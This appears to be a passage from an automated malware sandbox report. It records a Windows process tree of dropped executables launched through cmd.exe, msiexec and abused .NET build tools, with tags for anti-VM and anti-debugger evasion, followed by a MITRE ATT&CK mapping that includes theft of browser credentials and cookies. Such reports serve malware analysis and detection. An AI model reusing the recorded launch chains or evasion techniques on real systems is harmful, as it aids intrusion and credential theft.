- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1324
- C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe
  "C:\Users\Admin\AppData\Local\Temp\10483150101\5Jq9U1v.exe"
  2⤵
  PID:4984
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    3⤵
    PID:2100
- C:\Users\Admin\AppData\Roaming\runtimebroker.exe
  "C:\Users\Admin\AppData\Roaming\runtimebroker.exe"
  2⤵
  PID:7024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:2472
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:4696

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:4848
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6076
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cructngw\cructngw.cmdline"
    3⤵
    PID:4520
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCB8.tmp" "c:\Users\Admin\AppData\Local\Temp\cructngw\CSCBFC955226AF4F57B5CC5FA8E3FCBD6D.TMP"
      4⤵
      PID:4512
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5732
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5548
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
  2⤵
  PID:7596

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4424

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:552
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  PID:376
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      PID:5000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      PID:4280

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1740

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:2844

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\runtimebroker.exe
1⤵
PID:5820
- C:\Users\Admin\AppData\Roaming\runtimebroker.exe
  C:\Users\Admin\AppData\Roaming\runtimebroker.exe
  2⤵
  PID:6932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Authentication Process

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion